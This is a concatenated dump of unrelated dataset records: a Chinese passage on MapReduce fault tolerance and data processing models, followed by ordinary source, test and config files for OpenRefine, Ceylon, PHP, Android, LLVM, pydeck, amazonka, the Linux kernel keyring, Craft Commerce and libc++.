不加区分的数据转储转移了解释数据的负担:数据集的生产者不再需要强制将其转化为标准格式,数据的解释成为消费者的问题(读时模式方法;参阅“文档模型中的架构灵活性”)。如果生产者和消费者是不同优先级的不同团队,这可能是一种优势。甚至可能不存在一个理想的数据模型,对于不同目的有不同的合适视角。以原始形式简单地转储数据,可以允许多种这样的转换。这种方法被称为寿司原则(sushi principle):“原始数据更好”。
因此,Hadoop 经常被用于实现 ETL 过程:事务处理系统中的数据以某种原始形式转储到分布式文件系统中,然后编写 MapReduce 作业来清理数据,将其转换为关系形式,并将其导入 MPP 数据仓库以进行分析。数据建模仍然在进行,但它在一个单独的步骤中进行,与数据收集相解耦。这种解耦是可行的,因为分布式文件系统支持以任何格式编码的数据。
# 处理模型多样性
MPP 数据库是单体的,紧密集成的软件,负责磁盘上的存储布局,查询计划,调度和执行。由于这些组件都可以针对数据库的特定需求进行调整和优化,因此整个系统可以在其设计针对的查询类型上取得非常好的性能。而且,SQL 查询语言允许以优雅的语法表达查询,而无需编写代码,使业务分析师用来做商业分析的可视化工具(例如 Tableau)能够访问。另一方面,并非所有类型的处理都可以合理地表达为 SQL 查询。例如,如果要构建机器学习和推荐系统,或者使用相关性排名模型的全文搜索索引,或者执行图像分析,则很可能需要更一般的数据处理模型。这些类型的处理通常是特别针对特定应用的(例如机器学习的特征工程,机器翻译的自然语言模型,欺诈预测的风险评估函数),因此它们不可避免地需要编写代码,而不仅仅是查询。
MapReduce 使工程师能够轻松地在大型数据集上运行自己的代码。如果你有 HDFS 和 MapReduce,那么你可以在它之上建立一个 SQL 查询执行引擎,事实上这正是 Hive 项目所做的。但是,你也可以编写许多其他形式的批处理,这些批处理不必非要用 SQL 查询表示。随后,人们发现 MapReduce 对于某些类型的处理而言局限性很大,表现很差,因此在 Hadoop 之上其他各种处理模型也被开发出来。有两种处理模型,SQL 和 MapReduce,还不够,需要更多不同的模型!而且由于 Hadoop 平台的开放性,实施一整套方法是可行的,而这在单体 MPP 数据库的范畴内是不可能的。
至关重要的是,这些不同的处理模型都可以在共享的单个机器集群上运行,所有这些机器都可以访问分布式文件系统上的相同文件。在 Hadoop 方法中,不需要将数据导入到几个不同的专用系统中进行不同类型的处理:系统足够灵活,可以支持同一个群集内不同的工作负载。不需要移动数据,使得从数据中挖掘价值变得容易得多,也使采用新的处理模型容易的多。Hadoop 生态系统包括随机访问的 OLTP 数据库,如 HBase 和 MPP 风格的分析型数据库,如 Impala 。HBase 与 Impala 都不使用 MapReduce,但都使用 HDFS 进行存储。它们是迥异的数据访问与处理方法,但是它们可以共存,并被集成到同一个系统中。
# 针对频繁故障设计
当比较 MapReduce 和 MPP 数据库时,两种不同的设计思路出现了:处理故障和使用内存与磁盘的方式。与在线系统相比,批处理对故障不太敏感,因为就算失败也不会立即影响到用户,而且它们总是能再次运行。如果一个节点在执行查询时崩溃,大多数 MPP 数据库会中止整个查询,并让用户重新提交查询或自动重新运行它。由于查询通常最多运行几秒钟或几分钟,所以这种错误处理的方法是可以接受的,因为重试的代价不是太大。MPP 数据库还倾向于在内存中保留尽可能多的数据(例如,使用散列连接)以避免从磁盘读取的开销。
另一方面,MapReduce 可以容忍单个 Map 或 Reduce 任务的失败,而不会影响作业的整体,通过以单个任务的粒度重试工作。它也会非常急切地将数据写入磁盘,一方面是为了容错,另一部分是因为假设数据集太大而不能适应内存。
MapReduce 方式更适用于较大的作业:要处理如此之多的数据并运行很长时间的作业,以至于在此过程中很可能至少遇到一个任务故障。在这种情况下,由于单个任务失败而重新运行整个作业将是非常浪费的。即使以单个任务的粒度进行恢复引入了使得无故障处理更慢的开销,但如果任务失败率足够高,这仍然是一种合理的权衡。但是这些假设有多么现实呢?在大多数集群中,机器故障确实会发生,但是它们不是很频繁:可能少到绝大多数作业都不会经历机器故障。为了容错,真的值得带来这么大的额外开销吗?
要了解 MapReduce 节约使用内存和在任务的层次进行恢复的原因,了解最初设计 MapReduce 的环境是很有帮助的。Google 有着混用的数据中心,在线生产服务和离线批处理作业在同样机器上运行。每个任务都有一个通过容器强制执行的资源配给(CPU 核心,RAM,磁盘空间等)。每个任务也具有优先级,如果优先级较高的任务需要更多的资源,则可以终止(抢占)同一台机器上较低优先级的任务以释放资源。优先级还决定了计算资源的定价:团队必须为他们使用的资源付费,而优先级更高的进程花费更多。
这种架构允许非生产(低优先级)计算资源被过量使用(overcommitted),因为系统知道必要时它可以回收资源。与分离生产和非生产任务的系统相比,过量使用资源可以更好地利用机器并提高效率。但由于 MapReduce 作业以低优先级运行,它们随时都有被抢占的风险,因为优先级较高的进程可能需要其资源。在高优先级进程拿走所需资源后,批量作业能有效地“捡面包屑”,利用剩下的任何计算资源。在谷歌,运行一个小时的 MapReduce 任务有大约有 5%的风险被终止,为了给更高优先级的进程挪地方。这一概率比硬件问题,机器重启或其他原因的概率高了一个数量级。按照这种抢占率,如果一个作业有 100 个任务,每个任务运行 10 分钟,那么至少有一个任务在完成之前被终止的风险大于 50%。
这就是 MapReduce 被设计为容忍频繁意外任务终止的原因:不是因为硬件很不可靠,而是因为任意终止进程的自由有利于提高计算集群中的资源利用率。在开源的集群调度器中,抢占的使用较少。YARN 的 CapacityScheduler 支持抢占,以平衡不同队列的资源分配,但在编写本文时,YARN,Mesos 或 Kubernetes 不支持通用优先级抢占。在任务不经常被终止的环境中,MapReduce 的这一设计决策就没有多少意义了。在下一节中,我们将研究一些与 MapReduce 设计决策相异的替代方案。
| {
"pile_set_name": "Github"
} |
/*
Copyright 2010, Google Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer
in the documentation and/or other materials provided with the
distribution.
* Neither the name of Google Inc. nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
@import-less url("../theme.less");
#expression-preview-tabs .ui-tabs-nav li a {
padding: 0.15em 1em;
}
textarea.expression-preview-code {
font-family: monospace;
height: 5em;
vertical-align: top;
}
.expression-preview-parsing-status {
color: @light_grey;
}
.expression-preview-parsing-status.error {
color: red;
}
#expression-preview-tabs-preview,
#expression-preview-tabs-help,
#expression-preview-tabs-history,
#expression-preview-tabs-starred {
padding: @padding_tight;
overflow: hidden;
}
#expression-preview-tabs-preview > div,
#expression-preview-tabs-help > div,
#expression-preview-tabs-history > div,
#expression-preview-tabs-starred {
height: 200px;
overflow: auto;
}
#expression-preview-tabs-preview td, #expression-preview-tabs-preview th,
#expression-preview-tabs-help td, #expression-preview-tabs-help th,
#expression-preview-tabs-history td, #expression-preview-tabs-history th,
#expression-preview-tabs-starred td, #expression-preview-tabs-starred th {
padding: @padding_tight;
}
.expression-preview-table-wrapper {
padding: @padding_normal;
}
.expression-preview-container td {
padding: 2px 5px;
border-top: 1px solid #ccc;
}
td.expression-preview-heading {
border-top: none;
background: #ddd;
font-weight: bold;
}
td.expression-preview-value {
max-width: 250px !important;
white-space: pre-wrap;
overflow-x: hidden;
}
.expression-preview-special-value {
color: #aaa;
}
.expression-preview-help-container h3 {
margin-top: @padding_looser;
margin-bottom: @padding_normal;
border-bottom: 1px solid @light_grey;
}
.expression-preview-doc-item-title {
font-weight: bold;
text-align: right;
}
.expression-preview-doc-item-params {
}
.expression-preview-doc-item-returns {
}
.expression-preview-doc-item-desc {
color: #666;
}
| {
"pile_set_name": "Github"
} |
package org.eclipse.ceylon.compiler.java.test.annotations;
@.org.eclipse.ceylon.compiler.java.metadata.Ceylon(
major = 8,
minor = 1)
@.org.eclipse.ceylon.compiler.java.metadata.Attribute
@.org.eclipse.ceylon.compiler.java.metadata.Name("attr1")
final class attr1_ {
private attr1_() {
}
private static final long $object$;
@.org.eclipse.ceylon.compiler.java.metadata.Ignore
private static volatile boolean $init$$object$ = false;
private static final .java.lang.Throwable $initException$;
static {
try {
$object$ = 1L;
.org.eclipse.ceylon.compiler.java.test.annotations.attr1_.$init$$object$ = true;
$initException$ = null;
} catch (.java.lang.Throwable x) {
$initException$ = x;
$object$ = 0L;
.org.eclipse.ceylon.compiler.java.test.annotations.attr1_.$init$$object$ = false;
}
}
public static long get_() {
if (.org.eclipse.ceylon.compiler.java.test.annotations.attr1_.$init$$object$) {
return .org.eclipse.ceylon.compiler.java.test.annotations.attr1_.$object$;
} else {
if ($initException$ != null) .org.eclipse.ceylon.compiler.java.Util.rethrow($initException$);
throw new .ceylon.language.InitializationError("Cyclic initialization trying to read the value of \'attr1\' before it was set");
}
}
}
@.org.eclipse.ceylon.compiler.java.metadata.Ceylon(
major = 8,
minor = 1)
@.org.eclipse.ceylon.compiler.java.metadata.Attribute
@.org.eclipse.ceylon.compiler.java.metadata.Name("attr2")
final class attr2_ {
private attr2_() {
}
private static long $object$;
@.org.eclipse.ceylon.compiler.java.metadata.Ignore
private static volatile boolean $init$$object$ = false;
private static final .java.lang.Throwable $initException$;
static {
try {
.org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$object$ = 1L;
.org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$init$$object$ = true;
$initException$ = null;
} catch (.java.lang.Throwable x) {
$initException$ = x;
.org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$object$ = 0L;
.org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$init$$object$ = false;
}
}
@.ceylon.language.VariableAnnotation$annotation$
public static long get_() {
if (.org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$init$$object$) {
return .org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$object$;
} else {
if ($initException$ != null) .org.eclipse.ceylon.compiler.java.Util.rethrow($initException$);
throw new .ceylon.language.InitializationError("Cyclic initialization trying to read the value of \'attr2\' before it was set");
}
}
public static void set_(@.org.eclipse.ceylon.compiler.java.metadata.Name("attr2")
final long attr2) {
if ($initException$ != null) .org.eclipse.ceylon.compiler.java.Util.rethrow($initException$);
.org.eclipse.ceylon.compiler.java.test.annotations.attr2_.$object$ = attr2;
}
}
@.org.eclipse.ceylon.compiler.java.metadata.Ceylon(
major = 8,
minor = 1)
@.org.eclipse.ceylon.compiler.java.metadata.Attribute
@.org.eclipse.ceylon.compiler.java.metadata.Name("attr3")
final class attr3_ {
private attr3_() {
}
@.org.eclipse.ceylon.compiler.java.metadata.Transient
public static long get_() {
return 1L;
}
}
@.org.eclipse.ceylon.compiler.java.metadata.Ceylon(
major = 8,
minor = 1)
@.org.eclipse.ceylon.compiler.java.metadata.Attribute
@.org.eclipse.ceylon.compiler.java.metadata.Name("attr4")
final class attr4_ {
private attr4_() {
}
@.org.eclipse.ceylon.compiler.java.metadata.Transient
public static long get_() {
return 1L;
}
public static void set_(@.org.eclipse.ceylon.compiler.java.metadata.Name("attr4")
final long attr4) {
}
} | {
"pile_set_name": "Github"
} |
--TEST--
SPL: Spl File Info test getOwner
--CREDITS--
Cesare D'Amico <[email protected]>
Andrea Giorgini <[email protected]>
Filippo De Santis <[email protected]>
Daniel Londero <[email protected]>
Francesco Trucchia <[email protected]>
Jacopo Romei <[email protected]>
#Test Fest Cesena (Italy) on 2009-06-20
--SKIPIF--
<?php
if (substr(PHP_OS, 0, 3) == 'WIN') die("skip this test not for Windows platforms");
?>
--FILE--
<?php
//file
$fileInfo = new SplFileInfo('not_existing');
var_dump($fileInfo->getOwner());
?>
--EXPECTF--
Fatal error: Uncaught exception 'RuntimeException' with message 'SplFileInfo::getOwner(): stat failed for not_existing' in %s
Stack trace:
#0 %s: SplFileInfo->getOwner()
#1 {main}
thrown in %s on line %d
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<layer-list xmlns:android="http://schemas.android.com/apk/res/android">
<item android:drawable="@drawable/placeholder_gradient"/>
<item android:drawable="@drawable/vd_genre"
android:top="@dimen/placeholder_genre_padding"
android:bottom="@dimen/placeholder_genre_padding"
android:left="@dimen/placeholder_genre_padding"
android:right="@dimen/placeholder_genre_padding"/>
</layer-list> | {
"pile_set_name": "Github"
} |
// RUN: llvm-tblgen -gen-disassembler -I %p/../../include %s | FileCheck %s
// Check that we don't generate invalid code of the form "( && Cond2)" when
// emitting AssemblerPredicate conditions. In the example below, the invalid
// code would be: "return ( && (Bits & arch::AssemblerCondition2));".
include "llvm/Target/Target.td"
def archInstrInfo : InstrInfo { }
def arch : Target {
let InstructionSet = archInstrInfo;
}
def Pred1 : Predicate<"Condition1">;
def Pred2 : Predicate<"Condition2">,
AssemblerPredicate<"AssemblerCondition2">;
def foo : Instruction {
let Size = 2;
let OutOperandList = (outs);
let InOperandList = (ins);
field bits<16> Inst;
let Inst = 0xAAAA;
let AsmString = "foo";
field bits<16> SoftFail = 0;
// This is the important bit:
let Predicates = [Pred1, Pred2];
}
// CHECK: return (Bits[arch::AssemblerCondition2]);
| {
"pile_set_name": "Github"
} |
"""
GeoJsonLayer
===========
Property values in Vancouver, Canada, adapted from the deck.gl example pages. Input data is in a GeoJSON format.
"""
import pydeck
DATA_URL = "https://raw.githubusercontent.com/visgl/deck.gl-data/master/examples/geojson/vancouver-blocks.json"
LAND_COVER = [[[-123.0, 49.196], [-123.0, 49.324], [-123.306, 49.324], [-123.306, 49.196]]]
INITIAL_VIEW_STATE = pydeck.ViewState(latitude=49.254, longitude=-123.13, zoom=11, max_zoom=16, pitch=45, bearing=0)
polygon = pydeck.Layer(
"PolygonLayer",
LAND_COVER,
stroked=False,
# processes the data as a flat longitude-latitude pair
get_polygon="-",
get_fill_color=[0, 0, 0, 20],
)
geojson = pydeck.Layer(
"GeoJsonLayer",
DATA_URL,
opacity=0.8,
stroked=False,
filled=True,
extruded=True,
wireframe=True,
get_elevation="properties.valuePerSqm / 20",
get_fill_color="[255, 255, properties.growth * 255]",
get_line_color=[255, 255, 255],
)
r = pydeck.Deck(layers=[polygon, geojson], initial_view_state=INITIAL_VIEW_STATE)
r.to_html("geojson_layer.html")
| {
"pile_set_name": "Github"
} |
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
{-# OPTIONS_GHC -fno-warn-unused-binds #-}
{-# OPTIONS_GHC -fno-warn-unused-matches #-}
-- Derived from AWS service descriptions, licensed under Apache 2.0.
-- |
-- Module : Network.AWS.MachineLearning.DescribeTags
-- Copyright : (c) 2013-2018 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <[email protected]>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
-- Describes one or more of the tags for your Amazon ML object.
--
--
module Network.AWS.MachineLearning.DescribeTags
(
-- * Creating a Request
describeTags
, DescribeTags
-- * Request Lenses
, dtResourceId
, dtResourceType
-- * Destructuring the Response
, describeTagsResponse
, DescribeTagsResponse
-- * Response Lenses
, dtrsResourceId
, dtrsResourceType
, dtrsTags
, dtrsResponseStatus
) where
import Network.AWS.Lens
import Network.AWS.MachineLearning.Types
import Network.AWS.MachineLearning.Types.Product
import Network.AWS.Prelude
import Network.AWS.Request
import Network.AWS.Response
-- | /See:/ 'describeTags' smart constructor.
data DescribeTags = DescribeTags'
{ _dtResourceId :: !Text
, _dtResourceType :: !TaggableResourceType
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'DescribeTags' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'dtResourceId' - The ID of the ML object. For example, @exampleModelId@ .
--
-- * 'dtResourceType' - The type of the ML object.
describeTags
:: Text -- ^ 'dtResourceId'
-> TaggableResourceType -- ^ 'dtResourceType'
-> DescribeTags
describeTags pResourceId_ pResourceType_ =
DescribeTags' {_dtResourceId = pResourceId_, _dtResourceType = pResourceType_}
-- | The ID of the ML object. For example, @exampleModelId@ .
dtResourceId :: Lens' DescribeTags Text
dtResourceId = lens _dtResourceId (\ s a -> s{_dtResourceId = a})
-- | The type of the ML object.
dtResourceType :: Lens' DescribeTags TaggableResourceType
dtResourceType = lens _dtResourceType (\ s a -> s{_dtResourceType = a})
instance AWSRequest DescribeTags where
type Rs DescribeTags = DescribeTagsResponse
request = postJSON machineLearning
response
= receiveJSON
(\ s h x ->
DescribeTagsResponse' <$>
(x .?> "ResourceId") <*> (x .?> "ResourceType") <*>
(x .?> "Tags" .!@ mempty)
<*> (pure (fromEnum s)))
instance Hashable DescribeTags where
instance NFData DescribeTags where
instance ToHeaders DescribeTags where
toHeaders
= const
(mconcat
["X-Amz-Target" =#
("AmazonML_20141212.DescribeTags" :: ByteString),
"Content-Type" =#
("application/x-amz-json-1.1" :: ByteString)])
instance ToJSON DescribeTags where
toJSON DescribeTags'{..}
= object
(catMaybes
[Just ("ResourceId" .= _dtResourceId),
Just ("ResourceType" .= _dtResourceType)])
instance ToPath DescribeTags where
toPath = const "/"
instance ToQuery DescribeTags where
toQuery = const mempty
-- | Amazon ML returns the following elements.
--
--
--
-- /See:/ 'describeTagsResponse' smart constructor.
data DescribeTagsResponse = DescribeTagsResponse'
{ _dtrsResourceId :: !(Maybe Text)
, _dtrsResourceType :: !(Maybe TaggableResourceType)
, _dtrsTags :: !(Maybe [Tag])
, _dtrsResponseStatus :: !Int
} deriving (Eq, Read, Show, Data, Typeable, Generic)
-- | Creates a value of 'DescribeTagsResponse' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'dtrsResourceId' - The ID of the tagged ML object.
--
-- * 'dtrsResourceType' - The type of the tagged ML object.
--
-- * 'dtrsTags' - A list of tags associated with the ML object.
--
-- * 'dtrsResponseStatus' - -- | The response status code.
describeTagsResponse
:: Int -- ^ 'dtrsResponseStatus'
-> DescribeTagsResponse
describeTagsResponse pResponseStatus_ =
DescribeTagsResponse'
{ _dtrsResourceId = Nothing
, _dtrsResourceType = Nothing
, _dtrsTags = Nothing
, _dtrsResponseStatus = pResponseStatus_
}
-- | The ID of the tagged ML object.
dtrsResourceId :: Lens' DescribeTagsResponse (Maybe Text)
dtrsResourceId = lens _dtrsResourceId (\ s a -> s{_dtrsResourceId = a})
-- | The type of the tagged ML object.
dtrsResourceType :: Lens' DescribeTagsResponse (Maybe TaggableResourceType)
dtrsResourceType = lens _dtrsResourceType (\ s a -> s{_dtrsResourceType = a})
-- | A list of tags associated with the ML object.
dtrsTags :: Lens' DescribeTagsResponse [Tag]
dtrsTags = lens _dtrsTags (\ s a -> s{_dtrsTags = a}) . _Default . _Coerce
-- | -- | The response status code.
dtrsResponseStatus :: Lens' DescribeTagsResponse Int
dtrsResponseStatus = lens _dtrsResponseStatus (\ s a -> s{_dtrsResponseStatus = a})
instance NFData DescribeTagsResponse where
| {
"pile_set_name": "Github"
} |
StartChar: bar.sups
Encoding: 1114594 -1 1593
Width: 169
VWidth: 440
Flags: HMW
LayerCount: 3
Fore
Refer: 1290 -1 N 1 0 0 1 0 440 2
Validated: 1
Comment: "."
EndChar
| {
"pile_set_name": "Github"
} |
/* Request key authorisation token key definition.
*
* Copyright (C) 2005 Red Hat, Inc. All Rights Reserved.
* Written by David Howells ([email protected])
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version
* 2 of the License, or (at your option) any later version.
*
* See Documentation/security/keys-request-key.txt
*/
#include <linux/module.h>
#include <linux/sched.h>
#include <linux/err.h>
#include <linux/seq_file.h>
#include <linux/slab.h>
#include <linux/uaccess.h>
#include "internal.h"
#include <keys/user-type.h>
static int request_key_auth_preparse(struct key_preparsed_payload *);
static void request_key_auth_free_preparse(struct key_preparsed_payload *);
static int request_key_auth_instantiate(struct key *,
struct key_preparsed_payload *);
static void request_key_auth_describe(const struct key *, struct seq_file *);
static void request_key_auth_revoke(struct key *);
static void request_key_auth_destroy(struct key *);
static long request_key_auth_read(const struct key *, char __user *, size_t);
/*
* The request-key authorisation key type definition.
*/
struct key_type key_type_request_key_auth = {
.name = ".request_key_auth",
.def_datalen = sizeof(struct request_key_auth),
.preparse = request_key_auth_preparse,
.free_preparse = request_key_auth_free_preparse,
.instantiate = request_key_auth_instantiate,
.describe = request_key_auth_describe,
.revoke = request_key_auth_revoke,
.destroy = request_key_auth_destroy,
.read = request_key_auth_read,
};
static int request_key_auth_preparse(struct key_preparsed_payload *prep)
{
return 0;
}
static void request_key_auth_free_preparse(struct key_preparsed_payload *prep)
{
}
/*
* Instantiate a request-key authorisation key.
*/
static int request_key_auth_instantiate(struct key *key,
struct key_preparsed_payload *prep)
{
key->payload.data[0] = (struct request_key_auth *)prep->data;
return 0;
}
/*
* Describe an authorisation token.
*/
static void request_key_auth_describe(const struct key *key,
struct seq_file *m)
{
struct request_key_auth *rka = key->payload.data[0];
seq_puts(m, "key:");
seq_puts(m, key->description);
if (key_is_instantiated(key))
seq_printf(m, " pid:%d ci:%zu", rka->pid, rka->callout_len);
}
/*
* Read the callout_info data (retrieves the callout information).
* - the key's semaphore is read-locked
*/
static long request_key_auth_read(const struct key *key,
char __user *buffer, size_t buflen)
{
struct request_key_auth *rka = key->payload.data[0];
size_t datalen;
long ret;
datalen = rka->callout_len;
ret = datalen;
/* we can return the data as is */
if (buffer && buflen > 0) {
if (buflen > datalen)
buflen = datalen;
if (copy_to_user(buffer, rka->callout_info, buflen) != 0)
ret = -EFAULT;
}
return ret;
}
/*
* Handle revocation of an authorisation token key.
*
* Called with the key sem write-locked.
*/
static void request_key_auth_revoke(struct key *key)
{
struct request_key_auth *rka = key->payload.data[0];
kenter("{%d}", key->serial);
if (rka->cred) {
put_cred(rka->cred);
rka->cred = NULL;
}
}
/*
* Destroy an instantiation authorisation token key.
*/
static void request_key_auth_destroy(struct key *key)
{
struct request_key_auth *rka = key->payload.data[0];
kenter("{%d}", key->serial);
if (rka->cred) {
put_cred(rka->cred);
rka->cred = NULL;
}
key_put(rka->target_key);
key_put(rka->dest_keyring);
kfree(rka->callout_info);
kfree(rka);
}
/*
* Create an authorisation token for /sbin/request-key or whoever to gain
* access to the caller's security data.
*/
struct key *request_key_auth_new(struct key *target, const void *callout_info,
size_t callout_len, struct key *dest_keyring)
{
struct request_key_auth *rka, *irka;
const struct cred *cred = current->cred;
struct key *authkey = NULL;
char desc[20];
int ret;
kenter("%d,", target->serial);
/* allocate a auth record */
rka = kmalloc(sizeof(*rka), GFP_KERNEL);
if (!rka) {
kleave(" = -ENOMEM");
return ERR_PTR(-ENOMEM);
}
rka->callout_info = kmalloc(callout_len, GFP_KERNEL);
if (!rka->callout_info) {
kleave(" = -ENOMEM");
kfree(rka);
return ERR_PTR(-ENOMEM);
}
/* see if the calling process is already servicing the key request of
* another process */
if (cred->request_key_auth) {
/* it is - use that instantiation context here too */
down_read(&cred->request_key_auth->sem);
/* if the auth key has been revoked, then the key we're
* servicing is already instantiated */
if (test_bit(KEY_FLAG_REVOKED, &cred->request_key_auth->flags))
goto auth_key_revoked;
irka = cred->request_key_auth->payload.data[0];
rka->cred = get_cred(irka->cred);
rka->pid = irka->pid;
up_read(&cred->request_key_auth->sem);
}
else {
/* it isn't - use this process as the context */
rka->cred = get_cred(cred);
rka->pid = current->pid;
}
rka->target_key = key_get(target);
rka->dest_keyring = key_get(dest_keyring);
memcpy(rka->callout_info, callout_info, callout_len);
rka->callout_len = callout_len;
/* allocate the auth key */
sprintf(desc, "%x", target->serial);
authkey = key_alloc(&key_type_request_key_auth, desc,
cred->fsuid, cred->fsgid, cred,
KEY_POS_VIEW | KEY_POS_READ | KEY_POS_SEARCH |
KEY_USR_VIEW, KEY_ALLOC_NOT_IN_QUOTA, NULL);
if (IS_ERR(authkey)) {
ret = PTR_ERR(authkey);
goto error_alloc;
}
/* construct the auth key */
ret = key_instantiate_and_link(authkey, rka, 0, NULL, NULL);
if (ret < 0)
goto error_inst;
kleave(" = {%d,%d}", authkey->serial, atomic_read(&authkey->usage));
return authkey;
auth_key_revoked:
up_read(&cred->request_key_auth->sem);
kfree(rka->callout_info);
kfree(rka);
kleave("= -EKEYREVOKED");
return ERR_PTR(-EKEYREVOKED);
error_inst:
key_revoke(authkey);
key_put(authkey);
error_alloc:
key_put(rka->target_key);
key_put(rka->dest_keyring);
kfree(rka->callout_info);
kfree(rka);
kleave("= %d", ret);
return ERR_PTR(ret);
}
/*
* Search the current process's keyrings for the authorisation key for
* instantiation of a key.
*/
struct key *key_get_instantiation_authkey(key_serial_t target_id)
{
char description[16];
struct keyring_search_context ctx = {
.index_key.type = &key_type_request_key_auth,
.index_key.description = description,
.cred = current_cred(),
.match_data.cmp = key_default_cmp,
.match_data.raw_data = description,
.match_data.lookup_type = KEYRING_SEARCH_LOOKUP_DIRECT,
.flags = KEYRING_SEARCH_DO_STATE_CHECK,
};
struct key *authkey;
key_ref_t authkey_ref;
sprintf(description, "%x", target_id);
authkey_ref = search_process_keyrings(&ctx);
if (IS_ERR(authkey_ref)) {
authkey = ERR_CAST(authkey_ref);
if (authkey == ERR_PTR(-EAGAIN))
authkey = ERR_PTR(-ENOKEY);
goto error;
}
authkey = key_ref_to_ptr(authkey_ref);
if (test_bit(KEY_FLAG_REVOKED, &authkey->flags)) {
key_put(authkey);
authkey = ERR_PTR(-EKEYREVOKED);
}
error:
return authkey;
}
| {
"pile_set_name": "Github"
} |
maj=`sed 's/\([^ .]*\).\([^ ]*\) *\(.*\)/\1/' < ../../VERSION`
min=`sed 's/\([^ .]*\).\([^ ]*\) *\(.*\)/\2/' < ../../VERSION`
rev=`sed 's/\([^ .]*\).\([^ ]*\) *\(.*\)/\3/' < ../../VERSION`
for d in $*; do
sed -e s/@VERSION@/$maj.$min/ ../library/$d/DESCRIPTION.in > ../library/$d/DESCRIPTION
done
| {
"pile_set_name": "Github"
} |
<?php
/**
* @link https://craftcms.com/
* @copyright Copyright (c) Pixel & Tonic, Inc.
* @license https://craftcms.github.io/license/
*/
namespace craft\commerce\migrations;
use Craft;
use craft\commerce\fields\Products;
use craft\db\Migration;
use craft\db\Query;
use craft\helpers\Json;
/**
* m180319_130001_fieldSettings migration.
*/
class m180319_130001_fieldSettings extends Migration
{
/**
* @inheritdoc
*/
public function safeUp()
{
$fields = (new Query())
->select(['id', 'type', 'translationMethod', 'settings'])
->from(['{{%fields}}'])
->where([
'type' => [
Products::class,
]
])
->all($this->db);
foreach ($fields as $field) {
$settings = Json::decodeIfJson($field['settings']);
if (!is_array($settings)) {
echo 'Field ' . $field['id'] . ' (' . $field['type'] . ') settings were invalid JSON: ' . $field['settings'] . "\n";
$settings = [];
}
$localized = ($field['translationMethod'] === 'site');
// Exception: Cannot use a scalar value as an array
$settings['localizeRelations'] = $localized;
// targetLocale => targetSiteId
if (!empty($settings['targetLocale'])) {
$site = Craft::$app->getSites()->getSiteByHandle($settings['targetLocale']);
if ($site) {
$settings['targetSiteId'] = $site->id;
} else {
$settings['targetSiteId'] = Craft::$app->getSites()->getPrimarySite()->id;
}
}
unset($settings['targetLocale']);
$this->update(
'{{%fields}}',
[
'translationMethod' => 'none',
'settings' => Json::encode($settings),
],
['id' => $field['id']],
[],
false);
}
return true;
}
/**
* @inheritdoc
*/
public function safeDown()
{
echo "m180319_130001_fieldSettings cannot be reverted.\n";
return false;
}
}
| {
"pile_set_name": "Github"
} |
//===----------------------------------------------------------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
// UNSUPPORTED: c++98, c++03
// <filesystem>
// class path
// path& replace_filename()
#include "filesystem_include.h"
#include <type_traits>
#include <cassert>
#include "test_macros.h"
#include "test_iterators.h"
#include "count_new.h"
#include "filesystem_test_helper.h"
#include "assert_checkpoint.h"
#include "verbose_assert.h"
struct ReplaceFilenameTestcase {
const char* value;
const char* expect;
const char* filename;
};
const ReplaceFilenameTestcase TestCases[] =
{
{"/foo", "/bar", "bar"}
, {"/foo", "/", ""}
, {"foo", "bar", "bar"}
, {"/", "/bar", "bar"}
, {"\\", "bar", "bar"}
, {"///", "///bar", "bar"}
, {"\\\\", "bar", "bar"}
, {"\\/\\", "\\/bar", "bar"}
, {".", "bar", "bar"}
, {"..", "bar", "bar"}
, {"/foo\\baz/bong/", "/foo\\baz/bong/bar", "bar"}
, {"/foo\\baz/bong", "/foo\\baz/bar", "bar"}
};
int main(int, char**)
{
using namespace fs;
for (auto const & TC : TestCases) {
path p(TC.value);
ASSERT_EQ(p, TC.value);
path& Ref = (p.replace_filename(TC.filename));
ASSERT_EQ(p, TC.expect)
<< DISPLAY(TC.value)
